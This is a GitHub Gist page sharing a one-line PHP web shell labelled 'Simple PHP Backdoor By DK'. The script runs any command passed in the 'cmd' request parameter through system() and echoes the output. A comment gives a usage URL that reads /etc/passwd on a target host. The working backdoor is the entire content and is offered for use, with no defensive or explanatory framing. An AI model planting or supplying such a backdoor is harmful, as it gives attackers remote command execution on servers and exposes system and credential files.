Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save serundengsapi/b06ff0e8348fc1696f6fa0c945ec68b4 to your computer and use it in GitHub Desktop.

Select an option

Save serundengsapi/b06ff0e8348fc1696f6fa0c945ec68b4 to your computer and use it in GitHub Desktop.
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment